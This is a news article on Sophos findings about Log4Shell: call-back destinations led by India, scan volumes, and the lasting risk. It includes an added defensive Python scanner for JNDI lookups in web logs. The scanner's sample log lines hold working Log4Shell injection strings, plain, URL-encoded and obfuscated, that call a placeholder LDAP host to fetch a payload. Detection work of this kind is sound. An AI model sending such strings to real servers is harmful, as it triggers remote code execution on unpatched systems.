Log4j patch is already out, but India is top call back destination for vulnerable devices

While the world has not yet seen mass exploitation of the Log4j security flaw, the vulnerable library is buried deep in many digital applications and products and will likely remain a target for exploitation for years to come. India is the top call-back destination that vulnerable devices are reaching out to, according to new research by Sophos.
Thanks to the quick response by the global security companies, there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far, said Chester Wisniewski, principal research scientist at Sophos, in a blog. However, Sophos believes that the immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanised people into action.
The Log4j vulnerability disrupted servers of major web technology giants such as Microsoft, Amazon and Apple. For the uninitiated, Log4j is a very common logging library used by applications across the world; logging lets developers see the activity of an application. The vulnerability is serious because exploiting it could allow hackers to control Java-based web servers and launch what are called ‘remote code execution’ (RCE) attacks. In simple words, the vulnerability could allow a hacker to take control of a system.

Data from Sophos shows the top call-back destinations worldwide that vulnerable (unpatched) devices are reaching out to in order to retrieve a Java payload. This puts India in the number one position and also highlights Turkey, Brazil, the US and even Australia. It is difficult to speculate as to why these regions are top destinations for call-backs. One reason Wisniewski gives is active participants in bug bounty programs, who are hoping to earn money by being the first to alert organizations that they are exposed.
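The exploitation path described above starts with an attacker-controlled string reaching a vulnerable Log4j instance, which then performs a JNDI lookup and fetches a Java payload from the call-back host. A defender's first step is therefore to find those lookup strings in web access logs, including the URL-encoded and nested-lookup forms that scanners use to slip past naive string matching. The following Python scanner is an added example written for this article, not code from Sophos or the Log4j project; the log lines, host addresses (RFC 5737 documentation ranges) and function names are all constructed for illustration.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} expression: a lookup with no further "${" nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# A resolved JNDI lookup, the string that triggers the Log4Shell code path.
_JNDI = re.compile(r"\$\{jndi:[^}]*\}?", re.IGNORECASE)


def _resolve(expr: str, whole: str) -> str:
    """Expand one obfuscation-only lookup; leave anything else (incl. jndi:) untouched."""
    low = expr.lower()
    if low.startswith("jndi:"):
        return whole                        # this is what we want to surface, keep it
    if ":-" in expr:                        # ${anything:-default} evaluates to "default"
        return expr.split(":-", 1)[1]       # covers ${::-j} and ${env:NOPE:-j}
    if low.startswith("lower:"):
        return expr[len("lower:"):].lower()
    if low.startswith("upper:"):
        return expr[len("upper:"):].upper()
    return whole                            # unknown lookup: keep verbatim


def decode(raw: str) -> str:
    """URL-decode up to two layers; double encoding is common in scanner traffic."""
    s = raw
    for _ in range(2):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def normalize(s: str, max_rounds: int = 20) -> str:
    """Collapse nested lookup obfuscation from the inside out until the text is stable."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1), m.group(0)), s)
        if new == s:
            break
        s = new
    return s


def find_jndi_lookups(line: str) -> List[str]:
    """Return every JNDI lookup found in a log line after decoding and normalising."""
    return _JNDI.findall(normalize(decode(line)))


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, lookup) for every hit in a list of log lines."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(lines, start=1):
        for lookup in find_jndi_lookups(line):
            hits.append((n, lookup))
    return hits


# Constructed sample access-log lines (documentation addresses, not real hosts).
LOG_LINES = [
    '203.0.113.5 - - [20/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    # plain lookup in the User-Agent field
    '203.0.113.7 - - [20/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    # URL-encoded, with a ${lower:j} nested lookup hiding the "jndi" keyword
    '203.0.113.9 - - [20/Dec/2021:10:01:09 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    # default-value obfuscation: each ${::-x} evaluates to the single character x
    '203.0.113.11 - - [20/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://198.51.100.23:1389/c}"',
    '203.0.113.13 - - [20/Dec/2021:10:02:00 +0000] "GET /docs/log4j HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, lookup in scan_log(LOG_LINES):
        print(f"line {n}: {lookup}")
```

A hit in the access log only proves that a probe arrived, not that the lookup executed; to tell the two apart, pair this with egress monitoring for outbound LDAP, RMI or HTTP connections from application servers to the host named in the lookup, which is exactly the call-back traffic the Sophos data above is counting.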

Volume of exploit attempts

Wisniewski explains that in the first few days the volume of scans was moderate; within a week, however, there was a significant increase in scan detections, with numbers peaking between December 20 and December 23, 2021.
From late December through January 2022, however, the curve of attack attempts flattened out and declined. “This doesn’t mean the threat level declined too: by this time, an ever-greater percentage of detections were likely real attacks, with fewer coming from researchers monitoring the latest patching status,” the researcher noted.

The threat continues

According to Wisniewski, the threat is not over yet. “Just because we’ve steered round the immediate iceberg, that doesn’t mean we’re clear of the risk.”
As others have pointed out, some of the initial attack scans may have resulted in attackers securing access to a vulnerable target without, for instance, actually abusing that access to deliver malware, so the successful breach remains undetected.

In the past, Sophos has observed actors from countries such as Iran and North Korea pounce on VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy patches, then wait months before using that access in an attack.
Sophos believes that attempted exploitation of the Log4Shell vulnerability will likely continue for years and that it will become a favourite target for penetration testers and nation-state supported threat actors alike. “The urgency of identifying where it is used in applications and updating the software with the patch remains as critical as ever,” the researcher added.
